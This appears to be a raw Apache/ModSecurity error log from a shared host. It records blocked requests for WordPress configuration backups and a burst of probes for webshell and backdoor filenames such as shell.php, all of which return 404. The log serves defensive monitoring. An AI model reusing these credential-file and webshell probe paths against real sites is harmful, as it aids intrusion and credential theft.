[Mon May 11 16:55:41.370018 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/wp-config.php.backup"] [unique_id "agHt7UWKUxpmnkK7zHyH9gAAARY"]
[Mon May 11 16:55:42.182489 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHt7UWKUxpmnkK7zHyH9gAAARY"]
[Mon May 11 16:56:15.373490 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/backup.wp-config.php"] [unique_id "agHuDzJnyuKVXoStDha-3gAAAFc"]
[Mon May 11 16:56:15.373695 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/backup.wp-config.php"] [unique_id "agHuDzJnyuKVXoStDha-3gAAAFc"]
[Mon May 11 16:56:16.122315 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHuDzJnyuKVXoStDha-3gAAAFc"]
[Mon May 11 16:56:16.242515 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/backup.wp-config.php"] [unique_id "agHuEEWKUxpmnkK7zHyINgAAARY"]
[Mon May 11 16:56:16.242620 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/backup.wp-config.php"] [unique_id "agHuEEWKUxpmnkK7zHyINgAAARY"]
[Mon May 11 16:56:17.056351 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHuEEWKUxpmnkK7zHyINgAAARY"]
[Mon May 11 16:56:23.078518 2026] [security2:error] [pid 1411099:tid 1411109] [client 119.91.20.139:44554] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pweil.com"] [uri "/"] [unique_id "agHuFw-Qm4vhlWBPlMjEQAAAAAk"]
[Mon May 11 16:57:01.223904 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/new-wp-config.php"] [unique_id "agHuPTJnyuKVXoStDha_PQAAAFc"]
[Mon May 11 16:57:01.224503 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/new-wp-config.php"] [unique_id "agHuPTJnyuKVXoStDha_PQAAAFc"]
[Mon May 11 16:57:02.019688 2026] [security2:error] [pid 1412074:tid 1412099] [client 172.212.217.10:1928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHuPTJnyuKVXoStDha_PQAAAFc"]
[Mon May 11 16:57:02.131332 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.com"] [uri "/new-wp-config.php"] [unique_id "agHuPkWKUxpmnkK7zHyImwAAARY"]
[Mon May 11 16:57:02.131510 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.com"] [uri "/new-wp-config.php"] [unique_id "agHuPkWKUxpmnkK7zHyImwAAARY"]
[Mon May 11 16:57:02.970712 2026] [security2:error] [pid 1411055:tid 1411079] [client 172.212.217.10:1968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.com"] [uri "/index.php"] [unique_id "agHuPkWKUxpmnkK7zHyImwAAARY"]
[Mon May 11 16:57:21.951134 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/0x.php
[Mon May 11 16:57:22.217475 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/xenon1337.php
[Mon May 11 16:57:22.465678 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/mac.php
[Mon May 11 16:57:22.742360 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/hayuk.php
[Mon May 11 16:57:23.035939 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/0d.php
[Mon May 11 16:57:23.331009 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wefile.php
[Mon May 11 16:57:23.597176 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/casp3.php
[Mon May 11 16:57:23.862338 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/birlingsless.php
[Mon May 11 16:57:24.154580 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/unvouc.php
[Mon May 11 16:57:24.416036 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-signin.php
[Mon May 11 16:57:25.164031 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-links.php
[Mon May 11 16:57:25.913815 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/half.php
[Mon May 11 16:57:26.163811 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/2P.php
[Mon May 11 16:57:26.413528 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/tires.php
[Mon May 11 16:57:26.663441 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/aevly.php
[Mon May 11 16:57:26.805561 2026] [security2:error] [pid 1411099:tid 1411122] [client 185.176.207.186:51079] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHuVg-Qm4vhlWBPlMjEyAAAABY"], referer: https://www.piregwan-genesis.com/
[Mon May 11 16:57:27.171410 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-block.php
[Mon May 11 16:57:27.428213 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/like.php
[Mon May 11 16:57:27.677565 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/kj.php
[Mon May 11 16:57:27.928998 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/.well-known/about.php
[Mon May 11 16:57:28.435086 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wpxml.php
[Mon May 11 16:57:28.690339 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/bob.php
[Mon May 11 16:57:28.944883 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/spawns.php
[Mon May 11 16:57:29.207191 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/t3s.php
[Mon May 11 16:57:30.448185 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/uwu.php
[Mon May 11 16:57:30.703434 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/uwa.php
[Mon May 11 16:57:30.957076 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/crgio.php
[Mon May 11 16:57:31.218664 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/geforce.php
[Mon May 11 16:57:31.473328 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-load.php
[Mon May 11 16:57:31.734341 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/3PJcpMFsD8B.php
[Mon May 11 16:57:31.980885 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/.sghb.php
[Mon May 11 16:57:32.227507 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/zoko.php
[Mon May 11 16:57:32.474194 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/bgymj.php
[Mon May 11 16:57:32.728690 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/pucci.php
[Mon May 11 16:57:33.994751 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/one.php
[Mon May 11 16:57:34.247953 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/sl.php
[Mon May 11 16:57:34.501008 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-temp.php
[Mon May 11 16:57:35.017771 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/xmu.php
[Mon May 11 16:57:35.268070 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/mode.php
[Mon May 11 16:57:35.778393 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 16:57:36.040060 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/puc.php
[Mon May 11 16:57:36.291142 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/themes.php
[Mon May 11 16:57:36.549407 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/dx.php
[Mon May 11 16:57:36.795542 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/awa.php
[Mon May 11 16:57:37.043610 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/11.php
[Mon May 11 16:57:37.305147 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/p.php
[Mon May 11 16:57:37.819429 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/bthil.php
[Mon May 11 16:57:38.074652 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/shell.php
[Mon May 11 16:57:38.346907 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/seo.php
[Mon May 11 16:57:38.610785 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/7.php
[Mon May 11 16:57:38.864779 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/8.php
[Mon May 11 16:57:39.111565 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/1.php
[Mon May 11 16:57:39.382208 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/class.php
[Mon May 11 16:57:39.652126 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/100.php
[Mon May 11 16:57:39.911382 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/2026w.php
[Mon May 11 16:57:40.199301 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/about.php
[Mon May 11 16:57:40.461130 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/xa.php
[Mon May 11 16:57:40.707726 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 16:57:40.984929 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/w2025.php
[Mon May 11 16:57:41.231509 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/fvvff.php
[Mon May 11 16:57:41.499294 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/edit.php
[Mon May 11 16:57:41.748040 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/admin.php
[Mon May 11 16:57:42.278012 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/f6.php
[Mon May 11 16:57:42.579096 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/inputs.php
[Mon May 11 16:57:42.847637 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 16:57:43.413923 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-act.php
[Mon May 11 16:57:43.700358 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/classwithtostring.php
[Mon May 11 16:57:44.264509 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp-blog.php
[Mon May 11 16:57:45.038515 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/adminfuns.php
[Mon May 11 16:57:45.293830 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/goods.php
[Mon May 11 16:57:45.553805 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/ms-edit.php
[Mon May 11 16:57:45.818388 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/222.php
[Mon May 11 16:57:46.620711 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/BDKR28WP.php
[Mon May 11 16:57:47.410499 2026] [:error] [pid 1412074:tid 1412098] [client 20.9.31.235:20653] File does not exist: /home/manhatta/public_html/wp.php
[Mon May 11 16:57:48.379904 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/av.php
[Mon May 11 16:57:48.658880 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/abcd.php
[Mon May 11 16:57:48.904198 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/a1.php
[Mon May 11 16:57:49.713410 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/f35.php
[Mon May 11 16:57:50.223575 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/bal.php
[Mon May 11 16:57:50.991246 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/gettest.php
[Mon May 11 16:57:51.806994 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/simple.php
[Mon May 11 16:57:52.089347 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/buy.php
[Mon May 11 16:57:52.356150 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/xxx.php
[Mon May 11 16:57:52.602012 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/hypo.php
[Mon May 11 16:57:53.114107 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/chosen.php
[Mon May 11 16:57:53.665497 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/00.php
[Mon May 11 16:57:53.950962 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/als.php
[Mon May 11 16:57:54.217790 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/pol.php
[Mon May 11 16:57:54.462833 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/ms-amdin.php
[Mon May 11 16:57:54.719577 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/mini-type0.php
[Mon May 11 16:57:54.996070 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/bypasbnget.php
[Mon May 11 16:57:55.249515 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/sf.php
[Mon May 11 16:57:55.494974 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/file5.php
[Mon May 11 16:57:55.752698 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/fs.php
[Mon May 11 16:57:56.029869 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/4PJcpMFsD8B.php
[Mon May 11 16:57:56.275735 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/file.php
[Mon May 11 16:57:56.553547 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/class.1.php
[Mon May 11 16:57:56.799327 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/wp-gr.php
[Mon May 11 16:57:57.045011 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/cfile.php
[Mon May 11 16:57:57.323921 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/class-wp.php
[Mon May 11 16:57:57.570039 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/ff2.php
[Mon May 11 16:57:57.817368 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/aa2.php
[Mon May 11 16:57:58.101282 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/133.php
[Mon May 11 16:57:58.434908 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/ccou.php
[Mon May 11 16:57:58.697514 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/login8.php
[Mon May 11 16:57:58.979685 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/3586 b64.php
[Mon May 11 16:57:59.255950 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/18299.php
[Mon May 11 16:57:59.525492 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/nx1.php
[Mon May 11 16:57:59.779397 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/Noname6.php
[Mon May 11 16:58:00.054945 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/tia.php
[Mon May 11 16:58:00.323369 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/coa.php
[Mon May 11 16:58:00.580823 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/dr.php
[Mon May 11 16:58:00.851740 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/let.php
[Mon May 11 16:58:01.125932 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/w12.php
[Mon May 11 16:58:01.396672 2026] [:error] [pid 1411201:tid 1411260] [client 20.9.31.235:20620] File does not exist: /home/manhatta/public_html/chati.php
